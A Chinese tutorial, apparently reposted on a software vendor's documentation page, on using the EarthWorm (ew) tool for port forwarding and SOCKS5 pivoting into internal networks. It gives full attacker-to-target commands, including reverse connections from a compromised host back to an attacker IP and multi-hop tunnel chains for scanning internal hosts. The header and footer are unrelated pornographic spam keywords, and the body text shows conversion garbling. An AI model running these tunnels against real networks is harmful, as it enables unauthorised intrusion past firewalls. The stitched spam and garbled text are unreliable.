国产高清在线免费观看-国产高清在线免费无码-国产高清在线男人的天堂-国产高清在线视频-国产高清在线视频精品视频-国产高清在线视频伊甸园

LOGO OA教程 ERP教程 模切知識(shí)交流 PMS教程 CRM教程 開發(fā)文檔 其他文檔  
 
網(wǎng)站管理員

[點(diǎn)晴永久免費(fèi)OA]EarthWorm(ew):復(fù)雜網(wǎng)絡(luò)環(huán)境下內(nèi)網(wǎng)穿透、端口轉(zhuǎn)發(fā)及SOCKS5代理工具

admin
2023年10月21日 12:13 本文熱度 2108

導(dǎo)讀

一句話說(shuō)明:復(fù)雜內(nèi)網(wǎng)下,數(shù)據(jù)轉(zhuǎn)發(fā),轉(zhuǎn)出轉(zhuǎn)入工具;常用于socks5代理,深度掃描內(nèi)網(wǎng);

官方:EarthWorm是一款用于開啟 SOCKS v5 代理服務(wù)的工具,基于標(biāo)準(zhǔn) C 開發(fā),可提供多平臺(tái)間的轉(zhuǎn)接通訊,用于復(fù)雜網(wǎng)絡(luò)環(huán)境下的數(shù)據(jù)轉(zhuǎn)發(fā)。

零、前言

本文是在學(xué)習(xí)了下面參考文章的基礎(chǔ)上,基于自己的理解和心得補(bǔ)充了數(shù)據(jù)流量拓?fù)鋱D,這樣更好理解工具的使用場(chǎng)景和記住命令;本文僅作為技術(shù)交流。

一、要點(diǎn)先說(shuō)

1、ew 自身的各個(gè)選項(xiàng)用途說(shuō)明

-l 指定要監(jiān)聽的本地端口

-d 指定要反彈到的機(jī)器ip

-e 指定要反彈到的機(jī)器端口

-f 指定要主動(dòng)連接的機(jī)器ip

-g 指定要主動(dòng)連接的機(jī)器端口

-t 指定超時(shí)時(shí)長(zhǎng),默認(rèn)為1000

2、正向代理和反向代理用途的區(qū)別

正向代理的典型用途是為在防火墻內(nèi)的局域網(wǎng)客戶端提供訪問(wèn)Internet的途徑。

反向代理的典型用途是將防火墻后面的服務(wù)器提供給Internet用戶訪問(wèn)。

3、rssocks 啟動(dòng)的socks5服務(wù),轉(zhuǎn)發(fā)到最后一步必須使用rcsocks接收

4、工具下載地址

http://rootkiter.com/EarthWorm/supportlist/

Program NameDescribeEg
ew_for_Win.exe附件:ew.zip
適用各種Windows系統(tǒng)(X86指令集、X64指令集)Windows7、Windows XP
ew_for_Linux32各常見Linux發(fā)行版
(X86 指令集 CPU)Ubuntu(X86)/BT5(X86)
ew_for_linux64各常見Linux發(fā)行版
(X64 指令集 CPU)Ubuntu(X64)/Kali(X64)
ew_for_MacOSX64

MacOS系統(tǒng)發(fā)行版 (X64 指令集)蘋果PC電腦,蘋果server
ew_for_Arm32常見Arm-Linux系統(tǒng)
HTC New One(Arm-Android)/小米路由器(R1D)

ew_mipsel常見Mips-Linux系統(tǒng)
(Mipsel指令集 CPU)螢石硬盤錄像機(jī)、小米mini路由器(R1CM)

二、端口轉(zhuǎn)發(fā)功能

場(chǎng)景一

在攻擊機(jī)運(yùn)行工具,主動(dòng)連接靶機(jī)3389端口,并將靶機(jī)的3389映射到攻擊機(jī)本地1080端口;達(dá)到在攻擊機(jī)側(cè)訪問(wèn)本地1080端口,將數(shù)據(jù)轉(zhuǎn)發(fā)到靶機(jī)3389;

./ew -s lcx_tran -l 1080 -f 114.114.114.114 -g 3389

場(chǎng)景二

攻擊機(jī)側(cè)運(yùn)行工具,做1080端口轉(zhuǎn)發(fā)本地8080端口,且8080端口接受外部連接;靶機(jī)將本地3389端口數(shù)據(jù)轉(zhuǎn)發(fā)到攻擊機(jī)8080端口;
最終形成一條由靶機(jī)主動(dòng)外聯(lián)攻擊機(jī),并在靶機(jī)與攻擊機(jī)形成一條數(shù)據(jù)轉(zhuǎn)發(fā)通道:攻擊機(jī)1080<--------->3389靶機(jī)

第一步在本地電腦創(chuàng)建監(jiān)聽端口8080,防火墻和路由器需要開放本電腦此端口8080的訪問(wèn)權(quán)限:

./ew -s lcx_listen -l 1080 -e 8080

第二步在遠(yuǎn)端受控電腦上創(chuàng)建到本地電腦IP-114.114.114.114及端口8080的連接,以及提供訪問(wèn)的其他電腦IP-10.0.0.1及端口3389(不一定要是此遠(yuǎn)端電腦,可以是此遠(yuǎn)端電腦能夠訪問(wèn)到的其他電腦IP和端口):

./ew -s lcx_slave -d 114.114.114.114 -e 8080 -f 10.0.0.1 -g 3389

三、socks5代理功能

場(chǎng)景一(正向代理)

在靶機(jī)側(cè)運(yùn)行工具監(jiān)聽1080端口對(duì)外提供socks5代理服務(wù);在攻擊機(jī)側(cè)使用代理工具(例如:proxychains)連接靶機(jī)提供的socks5代理服務(wù),繼續(xù)滲透掃描內(nèi)網(wǎng)。

./ew -s ssocksd -l 1080

場(chǎng)景二(反向代理)

靶機(jī)側(cè)運(yùn)行工具,本地啟動(dòng)socks5服務(wù),主動(dòng)外聯(lián)攻擊機(jī)8080端口,攻擊機(jī)側(cè)運(yùn)行工具,將對(duì)外訪問(wèn)的8080端口與到本地1080端口做映射,進(jìn)行數(shù)據(jù)轉(zhuǎn)發(fā);

第一步在本地電腦創(chuàng)建監(jiān)聽端口8080,防火墻和路由器需要開放本電腦此端口8080的訪問(wèn)權(quán)限

./ew -s rcsocks -l 1080 -e 8080

第二步在遠(yuǎn)端受控電腦上創(chuàng)建到本地電腦IP-114.114.114.114及端口8080的連接

./ew -s rssocks -d 114.114.114.114 -e 8080

場(chǎng)景三(正向代理):

靶機(jī)側(cè)運(yùn)行工具啟動(dòng)socks5服務(wù),邊緣機(jī)側(cè)運(yùn)行工具將本地從1080端口收到的數(shù)據(jù)全部轉(zhuǎn)發(fā)到靶機(jī)1086端口,在攻擊機(jī)側(cè)使用代理工具(例如:proxychains)連接邊緣機(jī)提供的1080端口;最終達(dá)到攻擊機(jī)側(cè)與靶機(jī)之間形成socks5代理通道,繼續(xù)滲透掃描內(nèi)網(wǎng)。

第一步在遠(yuǎn)端靶機(jī)10.0.0.2上創(chuàng)建監(jiān)聽端口1086

./ew -s ssocksd -l 1086

第二步在遠(yuǎn)端邊緣機(jī)上創(chuàng)建創(chuàng)建端口1080到靶機(jī)10.0.0.2端口1086的轉(zhuǎn)發(fā),防火墻和路由器需要開放遠(yuǎn)端邊緣機(jī)端口1080的訪問(wèn)權(quán)限

./ew -s lcx_tran -l 1080 -f 10.0.0.2 -g 1086

場(chǎng)景四(反向代理):

靶機(jī)側(cè)運(yùn)行工具啟動(dòng)socks5服務(wù),邊緣機(jī)側(cè)運(yùn)行工具連接靶機(jī)1086端口并主動(dòng)外聯(lián)攻擊機(jī)8080端口;攻擊機(jī)側(cè)運(yùn)行工具,對(duì)外監(jiān)聽8080端口,并將數(shù)據(jù)轉(zhuǎn)發(fā)到本地1080端口;最終實(shí)現(xiàn)在攻擊機(jī)側(cè)1080端口<—>靶機(jī)之間形成一條代理通道;

第一步在遠(yuǎn)端靶機(jī)創(chuàng)建監(jiān)聽端口1086:

./ew -s ssocksd -l 1086

第二步在本地電腦上創(chuàng)建監(jiān)聽端口8080:

./ew -s lcx_listen -l 1080 -e 8080

第三步在遠(yuǎn)端邊緣機(jī)創(chuàng)建到本地電腦的連接:

./ew -s lcx_slave -d 114.114.114.114 -e 8080 -f 10.0.0.2 -g 1086

場(chǎng)景五(反向代理)-復(fù)雜型多級(jí)聯(lián)接

靶機(jī)側(cè)運(yùn)行工具本地啟動(dòng)socks5服務(wù)并反向連接中間機(jī)7777端口;中間機(jī)側(cè)運(yùn)行工具將9999端口與7777端口數(shù)據(jù)轉(zhuǎn)發(fā)互通;邊緣機(jī)側(cè)運(yùn)行工具,通過(guò)主動(dòng)外聯(lián)攻擊機(jī)8080端口將數(shù)據(jù)轉(zhuǎn)發(fā)到中間機(jī)9999端口;攻擊機(jī)側(cè)運(yùn)行工具,對(duì)外監(jiān)聽8080端口,并將數(shù)據(jù)轉(zhuǎn)發(fā)到本地1080端口;最終實(shí)現(xiàn)在攻擊機(jī)側(cè)1080端口<—>靶機(jī)之間形成一條代理通道;

第一步:

./ew -s lcx_listen -l 9999 -e 7777

第二步:

./ew -s rssocks -d 10.0.1.2 -e 7777

第三步:

./ew -s rcsocks -l 1080 -e 8080

第四步:

./ew -s lcx_slave -d 114.114.114.114 -e 8080 -f 10.0.0.2 -g 9999

四、最后說(shuō)點(diǎn)什么

1、耐下心來(lái)

剛開始看到這個(gè)工具本想一看而過(guò),后來(lái)耐心的學(xué)習(xí)一下,打開了新世界。

2、動(dòng)手實(shí)踐

看了很多文章也包括官方的文檔;發(fā)現(xiàn)對(duì)小白來(lái)說(shuō)想了解工具功能和不同場(chǎng)景,單看文字不直觀,沒(méi)有網(wǎng)絡(luò)拓?fù)浜茈y理解。所以本著自己邊學(xué)習(xí)邊記錄邊分享的精神,整理了這篇文章。

3、橫向比較

3.1 還發(fā)現(xiàn)了這個(gè)作者的另一個(gè)好用的工具Termite;目前EW和Termite作者已經(jīng)不維護(hù)了,工具下載方式如下:

#git clone https://github.com/rootkiter/Binary-files.git

#cd Binary-files

#git checkout bd32230

HEAD 目前位于 bd32230 fix ew version

#ls

EarthWorm README.md Termite

其中Termite文件夾下面就是工具;

3.2 然后我在學(xué)習(xí)Termite的過(guò)程中又找到了一個(gè)和Termite功能基本一致的工具Venom(地址:https://github.com/Dliv3/Venom),我可以說(shuō)這兩個(gè)工具對(duì)我來(lái)說(shuō)可以算是“神器”了!因?yàn)楸酒攸c(diǎn)是介紹EW的使用方法,后面再根據(jù)情況,也記錄一下這兩個(gè)“神器”工具的使用;

感興趣的小伙伴可以學(xué)習(xí)一下Termite/Venom,玩起來(lái)挺爽。

參考文章:

1、項(xiàng)目主頁(yè)

http://rootkiter.com/EarthWorm/附件:EarthWorm-master.zip

2、內(nèi)網(wǎng)穿透的n種姿勢(shì)

https://xz.aliyun.com/t/9454?accounttraceid=69827aec0fbd4da68045e255cee9fd32xlwo

3、EW使用

https://blog.csdn.net/ws13129/article/details/94445378

4、內(nèi)網(wǎng)滲透入門到放棄之必備殺器

https://www.shangyouw.cn/win7/arc36509.html

5、Termite官方介紹說(shuō)明

http://rootkiter.com/Termite/

http://rootkiter.com/Termite/README.txt

https://github.com/rootkiter/Termite

6、Venom官方介紹說(shuō)明

https://github.com/Dliv3/Venom


該文章在 2023/10/21 16:58:18 編輯過(guò)
關(guān)鍵字查詢
相關(guān)文章
正在查詢...
點(diǎn)晴ERP是一款針對(duì)中小制造業(yè)的專業(yè)生產(chǎn)管理軟件系統(tǒng),系統(tǒng)成熟度和易用性得到了國(guó)內(nèi)大量中小企業(yè)的青睞。
點(diǎn)晴PMS碼頭管理系統(tǒng)主要針對(duì)港口碼頭集裝箱與散貨日常運(yùn)作、調(diào)度、堆場(chǎng)、車隊(duì)、財(cái)務(wù)費(fèi)用、相關(guān)報(bào)表等業(yè)務(wù)管理,結(jié)合碼頭的業(yè)務(wù)特點(diǎn),圍繞調(diào)度、堆場(chǎng)作業(yè)而開發(fā)的。集技術(shù)的先進(jìn)性、管理的有效性于一體,是物流碼頭及其他港口類企業(yè)的高效ERP管理信息系統(tǒng)。
點(diǎn)晴WMS倉(cāng)儲(chǔ)管理系統(tǒng)提供了貨物產(chǎn)品管理,銷售管理,采購(gòu)管理,倉(cāng)儲(chǔ)管理,倉(cāng)庫(kù)管理,保質(zhì)期管理,貨位管理,庫(kù)位管理,生產(chǎn)管理,WMS管理系統(tǒng),標(biāo)簽打印,條形碼,二維碼管理,批號(hào)管理軟件。
點(diǎn)晴免費(fèi)OA是一款軟件和通用服務(wù)都免費(fèi),不限功能、不限時(shí)間、不限用戶的免費(fèi)OA協(xié)同辦公管理系統(tǒng)。
Copyright 2010-2025 ClickSun All Rights Reserved

主站蜘蛛池模板: 亚洲AV成人一区二区三区不卡 | 动漫无码无遮挡在线看中文 | 最新jizz欧美 | 免费国产黄网站在线观看 | 亚洲热线99精品视频 | 午夜无码人妻av大片色欲 | 免费光看午夜请高视频 | 亚洲欧美一区二区成人片 | 亚洲av无码乱码在线观看麻豆 | 国产三级黄片一区二区三区 | 中文字幕av高清片 | 亚洲精品无码久久久久不卡 | 秋霞免费理论片在线观看 | 精品免费国产一区二区三区四区 | 色欲制服video一区巨大 | 国产区日韩区欧美一区二区三区 | 久久精品亚洲一区二区三区浴池 | 人妻少妇无码一区 | a级毛片100部免费观看 | 久久久精品午夜免费不卡 | 国产精品日本不卡一区二区 | 熟女电影国产狠狠免费视频人妻 | 无码人妻久久久一区二区三区免费 | 日本AAAA特级毛片 | 国产成人a人亚洲精品无码 国产成人a区在线观看视频 | 国产精品欧美日韩另类中文 | 字幕无码日韩专区 | 不卡无码精品在线观看 | 日韩欧美在线播放免费 | 在线日韩欧美一区二区三区 | 一区二区三区国产好的精 | 亚洲乱亚洲乱少妇无码99P | 中文字幕人妻视频永久 | 欧美日韩大陆一级片 | 国产三区不卡在线观看 | 精品无码一区二区三区视在线 | 91亚洲国产成人久久精品蜜臀 | 国产白丝内射 | 成人午夜视频一区二区国语 | 国产日韩麻豆电影一区二区 | 少妇白浆高潮无码免 |